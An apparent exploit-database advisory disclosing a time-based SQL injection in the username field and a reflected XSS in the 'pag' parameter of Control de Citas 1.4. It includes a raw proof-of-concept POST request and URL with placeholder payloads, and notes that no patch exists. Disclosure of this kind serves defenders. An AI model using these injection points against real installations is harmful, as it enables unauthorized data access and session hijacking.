Control de Citas 1.4 (CIME) - Multiple Vulnerabilities

vendor:

Control de Citas

by:

vinicius777

7,5

CVSS

HIGH

SQL Injection & XSS Reflected

89 (SQL Injection) & 79 (XSS Reflected)

CWE

Product Name: Control de Citas

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: NO

Related CWE: N/A

CPE: a:cgaredes:control_de_citas:1.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Control de Citas 1.4 (CIME) – Multiple Vulnerabilities

The application is vulnerable to a time-based attack via a SQL injection in the 'USERNAME' parameter of the POST request. Additionally, the application is vulnerable to a reflected XSS attack when a malicious payload is sent in the 'pag' parameter of the citasmedicas.php page.

Mitigation:

Input validation should be used to prevent SQL injection and XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Control de Citas 1.4 (CIME) - Multiple Vulnerabilities
# Date: 01/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.cgaredes.tk/
# Software Link: http://sourceforge.net/projects/cime/files/latest/download?source=directory

 
[1] SQL Injection - 'USERNAME' vulnerable to time based attack

P0C: POST REQUEST 

POST /cime/citasmedicas.php?pag=citasmedindex HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cime/citasmedicas.php?pag=citasmedindex
Cookie: PHPSESSID=ftkms6mdqi3039r41felgm39s1; 
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=[SQL INJECTION]&password=pass


[2] XSS Reflected on citasmedicas.php (must be logged)

P0C = http://localhost/cime/citasmedicas.php?pag=[XSS]



##